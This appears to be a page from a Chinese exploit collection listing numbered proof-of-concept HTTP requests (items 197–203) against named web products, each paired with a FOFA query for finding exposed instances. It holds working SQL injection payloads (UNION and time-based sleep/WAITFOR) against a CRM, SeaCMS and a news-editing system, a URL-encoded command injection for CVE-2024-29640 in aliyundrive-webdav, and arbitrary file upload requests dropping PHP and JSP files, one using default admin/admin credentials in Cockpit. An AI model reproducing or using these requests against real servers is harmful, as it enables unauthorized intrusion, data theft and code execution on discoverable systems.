197. 浙大恩特客户资源管理系统-Quotegask_editAction存在SQL注入
FOFA:app="浙大恩特客户资源管理系统"
GET /entsoft/Quotegask_editAction.entweb;.js?goonumStr=1')+UNION+ALL+SELECT+111*111--+&method=goonumIsExist HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36
Accept-Encoding: gzip, deflate
Connection: close
198.阿里云盘 WebDAV 命令注入
CVE-2024-29640
GET /cgi-bin/luci/admin/services/aliyundrive-webdav/query?sid=%60%6c%73%20%2f%3e%2f%77%77%77%2f%61%61%61%2e%74%78%74%60%20 HTTP/1.1
Cookie: sysauth=41273cb2cffef0bb5d0653592624cf64
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6
Connection: close
199. cockpit系统assetsmanager_upload接口 文件上传
1.执行poc进行csrf信息获取,并获取cookie,再上传访问得到结果:
GET /auth/login?to=/ HTTP/1.1
响应:200,返回值:csfr:"eyJ0eXAi0iJKV1QiLCJhbGci0iJIUsI1NiJ9.eyJjc2ZyIjoibG9naW4ifQ.6KvuRJo3-Dp2UouwGH9D8cmnXEL4NGNen9CX3ex86cw"
2.使用刚才上一步获取到的jwt获取cookie:
POST /auth/check HTTP/1.1
Content-Type: application/json
{"auth":{"user":"admin","password":"admin"},"csfr":"eyJ0eXAi0iJKV1QiLCJhbGci0iJIUsI1NiJ9.eyJjc2ZyIjoibG9naW4ifQ.6KvuRJo3-Dp2UouwGH9D8cmnXEL4NGNen9CX3ex86cw"}
响应:200,返回值:
Set-Cookie:mysession=95524f01e238bf51bb60d77ede3bea92: path=/
Fofa:title="Authenticate Please!"
POST /assetsmanager/upload HTTP/1.1
Content-Type: multipart/form-data; boundary=---------------------------36D28FBc36bd6feE7Fb3
Cookie: mysession=95524f01e238bf51bb60d77ede3bea92
-----------------------------36D28FBc36bd6feE7Fb3
Content-Disposition: form-data; name="files[]"; filename="tttt.php"
Content-Type: text/php
<?php echo "tttt";unlink(__FILE__);?>
-----------------------------36D28FBc36bd6feE7Fb3
Content-Disposition: form-data; name="folder"
-----------------------------36D28FBc36bd6feE7Fb3--
/storage/uploads/tttt.php
200. SeaCMS海洋影视管理系统dmku SQL注入
FOFA:app="海洋CMS"
GET /js/player/dmplayer/dmku/?ac=del&id=(select(0)from(select(sleep(5)))v)&type=list HTTP/1.1
Cookie: PHPSESSID=hlfl5flck9q3ng1blehhv86s4s
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
201. 方正全媒体新闻采编系统 binary SQL注入
FOFA:body="/newsedit/newsedit/" || app="FOUNDER-全媒体采编系统"
POST /newsedit/newsplan/task/binary.do HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
TableName=DOM_IMAGE+where+REFID%3D-1+union+select+%271%27%3B+WAITFOR+DELAY+%270%3A0%3A5%27%3Bselect+DOM_IMAGE+from+IMG_LARGE_PATH&FieldName=IMG_LARGE_PATH&KeyName=REFID&KeyID=1
202. 微擎系统 AccountEdit任意文件上传
FOFA:body="/Widgets/WidgetCollection/"
获取__VIEWSTATE和__EVENTVALIDATION值
GET /User/AccountEdit.aspx HTTP/1.1
Host: 滑板人之家
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/531.36 (KHTML, like Gecko) Chrome/83.0.4103.112 Safari/537.31
Content-Length: 0
替换__VIEWSTATE和__EVENTVALIDATION值
POST /User/AccountEdit.aspx HTTP/1.1
Accept-Encoding: gzip, deflate, br
Content-Type: multipart/form-data;boundary=---------------------------786435874t38587593865736587346567358735687
-----------------------------786435874t38587593865736587346567358735687
Content-Disposition: form-data; name="__VIEWSTATE"
__VIEWSTATE
-----------------------------786435874t38587593865736587346567358735687
Content-Disposition: form-data; name="__EVENTVALIDATION"
__EVENTVALIDATION
-----------------------------786435874t38587593865736587346567358735687
Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$upload"; filename="1123.txt"
Content-Type: text/plain
Hello World!
-----------------------------786435874t38587593865736587346567358735687
Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$bttnUpload"
上传图片
-----------------------------786435874t38587593865736587346567358735687
Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$txtLastName"
-----------------------------786435874t38587593865736587346567358735687
Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$txtEmail"
-----------------------------786435874t38587593865736587346567358735687--
/_data/Uploads/1123.txt
203. 红海云EHR PtFjk 文件上传
FOFA:body="RedseaPlatform"
POST /RedseaPlatform/PtFjk.mob?method=upload HTTP/1.1
Host: x.x.x.x
Accept-Encoding: gzip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryt7WbDl1tXogoZys4
Content-Length: 210
------WebKitFormBoundaryt7WbDl1tXogoZys4
Content-Disposition: form-data; name="fj_file"; filename="11.jsp"
Content-Type:image/jpeg
<% out.print("hello,eHR");%>
------WebKitFormBoundaryt7WbDl1tXogoZys4--
页:
[1]